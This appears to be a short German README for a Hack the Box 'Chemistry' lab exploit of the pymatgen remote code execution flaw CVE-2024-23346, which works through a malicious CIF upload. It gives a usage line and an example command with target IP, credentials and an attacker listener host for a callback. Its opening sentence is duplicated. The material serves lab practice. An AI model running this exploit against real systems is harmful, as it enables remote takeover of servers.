
Dies ist ein Exploit für die bekannte Remote Code Execution (RCE)-Schwachstelle in der Python-Bibliothek `pymatgen` (CVE-2024-23346) durch das Hochladen einer bösartigen `CIF`-Datei auf die gehostete `CIF Analyzer`-Website des Ziels, das auf der Chemistry-Maschine von Hack the Box läuft.
Dies ist ein Exploit für die bekannte Remote-Code-Ausführungs-Schwachstelle (RCE) in der Python-Bibliothek pymatgen (CVE-2024-23346) durch das Hochladen einer bösartigen CIF-Datei auf die gehostete CIF Analyzer-Website der Chemistry-Maschine von Hack the Box.
NVD-CVE-Link : https://nvd.nist.gov/vuln/detail/CVE-2024-23346
Verwendung: CVE-2024-23346-exploit.py -t targetIP -P targetPORT -u loggedusername -p loggedpassword -l tun0ip/lhost
Beispiel:
python3 CVE-2024-23346-exploit.py -t 10.10.11.38 -P 5000 -u ramon -p ramon -l 10.10.15.000
